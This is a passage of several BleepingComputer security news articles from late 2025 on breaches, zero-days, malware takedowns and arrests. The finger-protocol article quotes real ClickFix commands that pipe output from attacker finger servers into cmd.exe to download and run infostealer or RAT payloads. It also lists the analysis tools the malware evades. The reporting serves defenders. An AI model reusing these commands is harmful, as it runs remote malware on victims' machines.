"Our systems were never compromised and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies."

CrowdStrike did not specify the threat group responsible for the incident or the motivations of the malicious insider who shared screenshots.

However, this statement was provided in response to questions from BleepingComputer regarding screenshots of CrowdStrike systems that were recently posted on Telegram by members of the threat groups ShinyHunters, Scattered Spider, and Lapsus$.

ShinyHunters told BleepingComputer earlier today that they allegedly agreed to pay the insider $25,000 to provide them with access to CrowdStrike's network.

The threat actors claimed they ultimately received SSO authentication cookies from the insider, but by then, the suspected insider had already been detected by CrowdStrike, which had shut down his network access.

The extortion group added that they also attempted to purchase CrowdStrike reports on ShinyHunters and Scattered Spider, but did not receive them.

BleepingComputer contacted CrowdStrike again to confirm if this information is accurate and will update the story if we receive additional information.

The Scattered Lapsus$ Hunters cybercrime collective
These groups, now collectively calling themselves "Scattered Lapsus$ Hunters," have previously launched a data-leak site to extort dozens of companies impacted by a massive wave of Salesforce breaches.

Scattered Lapsus$ Hunters have been targeting Salesforce customers in voice phishing attacks since the start of the year, breaching companies such as Google, Cisco, Allianz Life, Farmers Insurance, Qantas, Adidas, ​​​​​​Workday, as well as LVMH subsidiaries, including Dior, Louis Vuitton, and Tiffany & Co.

Companies they attempted to extort include high-profile brands and organizations, such as Google, Cisco, Toyota, Instacart, Cartier, Adidas, Sake Fifth Avenue, Air France & KLM, FedEx, Disney/Hulu, Home Depot, Marriott, Gap, McDonald's, Walgreens, Transunion, HBO MAX, UPS, Chanel, and IKEA.

Scattered Lapsus$ Hunters also claimed responsibility for the Jaguar Land Rover (JLR) breach, stealing sensitive data and significantly disrupting operations, resulting in damages of over £196 million ($220 million) in the last quarter.

As BleepingComputer reported this week, the ShinyHunters and Scattered Spider extortion groups are switching to a new ransomware-as-a-service platform named ShinySp1d3r, after previously using other ransomware gangs' encryptors in attacks, including ALPHV/BlackCat, RansomHub, Qilin, and DragonForce.

This Thursday, ShinyHunters also claimed a new wave of data theft attacks that allegedly impacted Salesforce instances belonging to over 280 companies. In Telegram messages today, they said the list of breached companies contains multiple high-profile names, including LinkedIn, GitLab, Atlassian, Thomson Reuters, Verizon, F5, SonicWall, DocuSign, and Malwarebytes.

As the threat actors told BleepingComputer yesterday, they compromised the Salesforce instances after breaching Gainsight using secrets stolen in the Salesloft drift breach.

bleepingcomputer.com
By Lawrence Abrams
November 15, 2025

The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Abusing the finger command
Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the "finger root@finger.nateams[.]com" command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.

For example, a person on Reddit recently warned that they fell victim to a ClickFix attack that impersonated a Captcha, prompting them to run a Windows command to verify they were human.

"I just fell for verify you are human win + r. What do I do?," reads the Reddit post.

"I was in a rush and fell for this and ended up entering the following in my cmd prompt:"

"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"

Although the host is no longer responding to finger requests, another Reddit user captured the output.

This attack abuses the Finger protocol as a remote script delivery method, by running finger vke@finger.cloudmega[.]org and piping its output through the Windows command processor, cmd.exe.

This causes the retrieved commands to be executed, which creates a random-named path, copies curl.exe to a random filename, uses the renamed curl executable to download a zip archive disguised as a PDF [VirusTotal] from cloudmega[.]org, and extracts a Python malware package.

The Python program will then be executed using pythonw.exe init.py.

The final command executed is a call back to the attacker's server to confirm execution, while displaying a fake "Verify you are human" prompt to the user.

It is unclear what the purpose of the Python package is, but a related batch file indicates it was an infostealer.

MalwareHunterTeam also found a similar campaign that uses "finger Kove2@api.metrics-strange.com | cmd" to retrieve and run commands almost identical to the previously mentioned ClickFix attack.

BleepingComputer found this to be a more evolved attack, with the commands looking for tools commonly used in malware research and exiting if found. These tools include filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, WinDump, x64dbg, x32dbg, OllyDbg, and ProcessHacker.

If no malware analysis tools are found, the commands will download a zip archive disguised as PDF files and extract it. However, instead of extracting a malicious Python package from the fake PDF, it extracts the NetSupport Manager RAT package.
The commands will then configure a scheduled task to launch the remote access malware when the user logs in.

While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, as people continue to fall for them, it is essential to be aware of the campaigns.

For Defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, which is what is used to connect to a daemon over the Finger protocol.

bleepingcomputer.com
By Bill Toulas
November 12, 2025

An advanced threat actor exploited the critical vulnerabilities “Citrix Bleed 2" (CVE-2025-5777) in NetScaler ADC and Gateway, and CVE-2025-20337 affecting Cisco Identity Service Engine (ISE) as zero-days to deploy custom malware.

Amazon’s threat intelligence team, analyzing “MadPot” honeypot data, found that hackers leveraged the two security issues before the security issues were disclosed publicly and patches became available.

“Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day,” explains Amazon.

“Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic.”

Citrix Bleed 2 is a NetScaler ADC and Gateway out-of-bounds memory read problem that the vendor published fixes for in late June.

Although the vendor needed a longer period to confirm that the flaw was leveraged in attacks, despite multiple third-party reports claiming it was used in attacks, exploits became available in early July, and CISA tagged it as exploited.

The flaw in ISE (CVE-2025-20337), with a maximum severity score, was published on July 17, when Cisco warned that it could be exploited to let an unauthenticated attacker store malicious files, execute arbitrary code, or gain root privileges on vulnerable devices.

In less than five days, the vendor reissued its warning about CVE-2025-20337 being actively exploited. On July 28, researcher Bobby Gould published technical details in a write-up that included an exploit chain.

In a report shared with BleepingComputer, Amazon says that both flaws were leveraged in APT attacks before Cisco and Citrix published their initial security bulletins.

The hackers leveraged CVE-2025-20337 to gain pre-auth admin access to Cisco ISE endpoints, and deployed a custom web shell named ‘IdentityAuditAction,’ disguised as a legitimate ISE component.

The web shell registered as an HTTP listener to intercept all requests and used Java reflection to inject into Tomcat server threads.

It also employed DES encryption with non-standard base64 encoding for stealth, required knowledge of specific HTTP headers to access, and left minimal forensic traces behind.

The use of multiple undisclosed zero-day flaws and the advanced knowledge of Java/Tomcat internals and the Cisco ISE architecture all point to a highly resourced and advanced threat actor. However, Amazon could not attribute the activity to a known threat group.

Curiously, though, the targeting appeared indiscriminate, which doesn’t match the typically tight scope of highly targeted operations by such threat actors.

It is recommended to apply the available security updates for CVE-2025-5777 and CVE-2025-20337, and limit access to edge network devices through firewalls and layering.

bleepingcomputer.com
By Lawrence Abrams
November 11, 2025

The Rhadamanthys infostealer operation has been disrupted, with numerous

The Rhadamanthys infostealer operation has been disrupted, with numerous “customers” of the malware-as-a-service reporting that they no longer have access to their servers.

Rhadamanthys is an infostealer malware that steals credentials and authentication cookies from browsers, email clients, and other applications. It is commonly distributed through campaigns promoted as software cracks, YouTube videos, or malicious search advertisements.

The malware is offered on a subscription model, where cybercriminals pay the developer a monthly fee for access to the malware, support, and a web panel used to collect stolen data.

According to cybersecurity researchers known as g0njxa and Gi7w0rm, who both monitor malware operations like Rhadamanthys, report that cybercriminals involved in the operation claim that law enforcement gained access to their web panels.

In a post on a hacking forum, some customers state that they lost SSH access to their Rhadamanthys web panels, which now require a certificate to log in rather than their usual root password.

"If your password cannot log in. The server login method has also been changed to certificate login mode, please check and confirm, if so, immediately reinstall your server, erase traces, the German police are acting," wrote one of the customers.

Another Rhadamanthys subscriber claimed they were having the same issues, with their server's SSH access now also requiring certificate-based logins.

"I confirm that guests have visited my server and the password has been deleted.rootServer login became strictly certificate-based, so I had to immediately delete everything and power down the server. Those who installed it manually were probably unscathed, but those who installed it through the "smart panel" were hit hard," wrote another subscriber.

A message from the Rhadamanthys developer says they believe German law enforcement is behind the disruption, as web panels hosted in EU data centers had German IP addresses logging in before the cybercriminals lost access.

G0njxa told BleepingComputer that the Tor onion sites for the malware operation are also offline but do not currently have a police seizure banner, so it is unclear who exactly is behind the disruption.

Multiple researchers who have spoken to BleepingComputer believe this disruption could be related to an upcoming announcement from Operation Endgame, an ongoing law enforcement action targeting malware-as-a-service operations.

Operation Endgame has been behind numerous disruptions since it launched, including against ransomware infrastructure, and the AVCheck site, SmokeLoader, DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC malware operations.

The Operation Endgame website currently has a timer stating that new action will be disclosed on Thursday.

BleepingComputer contacted the German police, Europol, and the FBI, but has not received a reply at this time.

bleepingcomputer.com
By Sergiu Gatlan
November 7, 2025

Cisco warned this week that two vulnerabilities, which have been used in zero-day attacks, are now being exploited to force ASA and FTD firewalls into reboot loops.

The tech giant released security updates on September 25 to address the two security flaws, stating that CVE-2025-20362 enables remote threat actors to access restricted URL endpoints without authentication, while CVE-2025-20333 allows authenticated attackers to gain remote code execution on vulnerable devices.

When chained, these vulnerabilities allow remote, unauthenticated attackers to gain complete control over unpatched systems.

The same day, CISA issued an emergency directive ordering U.S. federal agencies to secure their Cisco firewall devices against attacks using this exploit chain within 24 hours. CISA also mandated them to disconnect ASA devices reaching their end of support (EoS) from federal organization networks.

Threat monitoring service Shadowserver is currently tracking over 34,000 internet-exposed ASA and FTD instances vulnerable to CVE-2025-20333 and CVE-2025-20362 attacks, down from the nearly 50,000 unpatched firewalls it spotted in September.

Now exploited in DoS attacks
"Cisco previously disclosed new vulnerabilities in certain Cisco ASA 5500-X devices running Cisco Secure Firewall ASA software with VPN web services enabled, discovered in collaboration with several government agencies. We attributed these attacks to the same state-sponsored group behind the 2024 ArcaneDoor campaign and urged customers to apply the available software fixes," a Cisco spokesperson told BleepingComputer this week.

"On November 5, 2025, Cisco became aware of a new attack variant targeting devices running Cisco Secure ASA Software or Cisco Secure FTD Software releases affected by the same vulnerabilities. This attack can cause unpatched devices to unexpectedly reload, leading to denial of service (DoS) conditions."

CISA and Cisco linked the attacks to the ArcaneDoor campaign, which exploited two other Cisco firewall zero-day bugs (CVE-2024-20353 and CVE-2024-20359) to breach government networks worldwide starting in November 2023. The UAT4356 threat group (tracked as STORM-1849 by Microsoft) behind the ArcaneDoor attacks deployed previously unknown Line Dancer in-memory shellcode loader and Line Runner backdoor malware to maintain persistence on compromised systems.

On September 25, Cisco fixed a third critical vulnerability (CVE-2025-20363) in its Cisco IOS and firewall software, which can allow unauthenticated threat actors to execute arbitrary code remotely. However, it didn't directly link it to the attacks exploiting CVE-2025-20362 and CVE-2025-20333, saying that its Product Security Incident Response Team was "not aware of any public announcements or malicious use of the vulnerability."

Since then, attackers have started exploiting another recently patched RCE vulnerability (CVE-2025-20352) in Cisco networking devices to deploy rootkit malware on unprotected Linux boxes.

More recently, on Thursday, Cisco released security updates to patch critical security flaws in its Contact Center software, which could enable attackers to bypass authentication (CVE-2025-20358) and execute commands with root privileges (CVE-2025-20354).

"We strongly recommend all customers upgrade to the software fixes outlined in our security advisories," Cisco added on Thursday.

bleepingcomputer.com
By Bill Toulas
October 15, 2025

U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code.

The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products.

BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide.

No supply-chain risk
It’s unclear how long the hackers maintained access, but the company confirmed that they stole source code, vulnerability data, and some configuration and implementation details for a limited number of customers.

"Through this access, certain files were exfiltrated, some of which contained certain portions of the Company's BIG-IP source code and information about undisclosed vulnerabilities that it was working on in BIG-IP," the company states.

Despite this critical exposure of undisclosed flaws, F5 says there's no evidence that the attackers leveraged the information in actual attacks, such as exploiting the undisclosed flaw against systems. The company also states that it has not seen evidence that the private information has been disclosed.

F5 claims that the threat actors' access to the BIG-IP environment did not compromise its software supply chain or result in any suspicious code modifications.

This includes its platforms that contain customer data, such as its CRM, financial, support case management, or iHealth systems. Furthermore, other products and platforms managed by the company are not compromised, including NGINX, F5 Distributed Cloud Services, or Silverline systems' source code.

Response to the breach
After discovering the intrusion, F5 took remediation action by tightening access to its systems, and improving its overall threat monitoring, detection, and response capabilities:

Rotated credentials and strengthened access controls across our systems.
Deployed improved inventory and patch management automation, as well as additional tooling to better monitor, detect, and respond to threats.
Implemented enhancements to our network security architecture.
Hardened our product development environment, including strengthening security controls and monitoring of all software development platforms.
Additionally, the company also focuses on the security of its products through source code reviews and security assessements with support from NCC Group and IOActive.

NCC Group's assessment covered security reviews of critical software components in BIG-IP and portions of the development pipeline in an effort that involved 76 consultants.

IOActive's expertise was called in after the security breach and the engagement is still in progress. The results so far show no evidence of the threat actor introducing vulnerablities in critical F5 software source code or the software development build pipeline.

Customers should take action
F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance.

To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.

Despite any evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

F5 confirmed that today's updates address the potential impact stemming from the stolen undisclosed vulnerabilities.

Furthermore, F5 support makes available a threat hunting guide for customers to improve detection and monitoring in their environment.

New best practices for hardening F5 systems now include automated checks to the F5 iHealth Diagnostic Tool, which can now flag security risks, vulnerabilities, prioritize actions, and provide remediation guidance.

Another recommendation is to enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts.

"Our global support team is available to assist. You can open a MyF5 support case or contact F5 support directly for help updating your BIG-IP software, implementing any of these steps, or to address any questions you may have" - F5

The company added that it has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms, including CrowdStrike and Mandiant.

On Monday, F5 announced that it rotated the cryptographic certcertificates and keys used for signing its digital products. The change affects installing BIG-IP and BIG-IQ TMOS software images while ISO image signature verification is enabled, and installing BIG-IP F5OS tenant images on host systems running F5OS.

Additional guidance for F5 customers comes from UK's National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

Both agencies recommmend identifying all F5 products (hardware, software, and virtualized) and making sure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should make compromise assessment.

F5 notes that it delayed the public disclosure of the incident at the U.S. government's request, presumably to allow enough time to secure critical systems.

"On September 12, 2025, the U.S. Department of Justice determined that a delay in public disclosure was warranted pursuant to Item 1.05(c) of Form 8-K. F5 is now filing this report in a timely manner," explains F5.

F5 states that the incident has no material impact on its operations. All services remain available and are considered safe, based on the latest available evidence.

BleepingComputer has contacted F5 to request more details about the incident, and we will update this post when we receive a response.

Picus Blue Report 2025

bleepingcomputer.com
By Bill Toulas
October 11, 2025

Spanish Guardia Civil have dismantled the “GXC Team” cybercrime operation and arrested its alleged leader, a 25-year-old Brazilian known as “GoogleXcoder.”

The GXC Team operated a crime-as-a-service (CaaS) platform offering AI-powered phishing kits, Android malware, and voice-scam tools via Telegram and a Russian-speaking hacker forum.

“The Civil Guard has dismantled one of the most active criminal organizations in the field of phishing in Spain, with the arrest of a 25-year-old Brazilian young man considered the main provider of tools for the massive theft of credentials in the Spanish-speaking environment,” announced Guardia Civil.

Group-IB has been tracking the operation and says that GXC Team was targeting banks, transport, and e-commerce entities in Spain, Slovakia, the UK, the US, and Brazil.

The phishing kits replicated the websites of tens of Spanish and international institutions, and powered at least 250 phishing sites.

The threat group also developed at least nine Android malware strains that intercepted SMS and one-time passwords (OTPs), useful for hijacking accounts and validating fraudulent transactions.

GXC Team also offered complete technical support and campaign customization services to its clients, acting as a pro-grade and high-yielding crime platform.

A police operation conducted on May 20, involved coordinated raids across Cantabria, Valladolid, Zaragoza, Barcelona, Palma de Mallorca, San Fernando, and La Línea de la Concepción.

During these actions, the authorities seized electronic devices containing phishing kit source code, communications with clients, and financial records.

Law enforcement agents recovered cryptocurrency stolen from victims and shut down Telegram channels used to promote the scams. One of these channels was named “Steal everything from grandmothers.”

The authorities stated that the nationwide raids were made possible thanks to the analysis of the seized devices and cryptocurrency transactions of GoogleXcoder, who was arrested more than a year ago.

“The forensic analysis of the seized devices, as well as the cryptocurrency transactions, which lasted for more than a year due to their complexity, made it possible to reconstruct the entire criminal network, managing to identify six people directly related to the use of these services,” explained Guardia Civil.

The investigation into the GXC Team is still ongoing, and Spanish authorities have mentioned the possibility of further actions leading to the arrest of more members of the cybercrime ring.